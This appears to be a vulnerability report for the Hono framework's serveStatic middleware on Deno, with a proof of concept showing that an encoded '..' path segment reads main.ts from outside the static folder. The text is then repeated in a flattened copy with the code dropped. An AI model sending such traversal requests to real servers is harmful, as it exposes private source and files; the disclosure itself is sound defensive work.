Summary
When using serveStatic with deno, it is possible to directory traverse where main.ts is located.
My environment is configured as per this tutorial
https://hono.dev/getting-started/deno
PoC
$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
└── a.txtsource
import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'
const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))
Deno.serve(app.fetch)request
curl localhost:8000/static/%2e%2e/main.ts
response is content of main.ts
Impact
Unexpected files are retrieved.
Summary
When using serveStatic with deno, it is possible to directory traverse where main.ts is located.
My environment is configured as per this tutorial
https://hono.dev/getting-started/deno
PoC
$ tree . ├── deno.json ├── deno.lock ├── main.ts ├── README.md └── static └── a.txtsource
request
response is content of main.ts
Impact
Unexpected files are retrieved.